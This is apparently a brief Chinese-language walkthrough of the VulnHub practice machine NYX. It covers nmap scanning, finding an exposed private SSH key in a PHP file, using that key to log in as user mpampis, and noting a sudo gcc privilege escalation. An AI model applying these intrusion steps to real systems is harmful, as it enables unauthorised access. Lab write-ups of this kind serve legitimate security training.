[VulnHub] NYX

0x421
0x421
  • 1.6K 次浏览

一、靶机介绍

名称:NYX

发布日期:15 Aug 2020

Download (Mirror): https://download.vulnhub.com/nyx/nyxvm.zip

二、信息收集

端口扫描

sudo nmap -p- 192.168.0.177 --min-rate=5000

详细信息扫描

sudo nmap -sT -sV -sC -O --script=vuln -p22,80 192.168.0.177

80端口发现有一个php文件

/d41d8cd98f00b204e9800998ecf8427e.php

可以发现这是一个私钥文件,保存为 id_rsa

chmod 600 id_rsa   #修改权限

获取私钥的公钥信息

ssh-keygen -y -f id_rsa > id_rsa.pub

三、getshell

利用生成的私钥进行登录

ssh -i id_rsa mpampis@192.168.0.177

四、提权

sudo -l

gcc直接提权

五、后记

呃....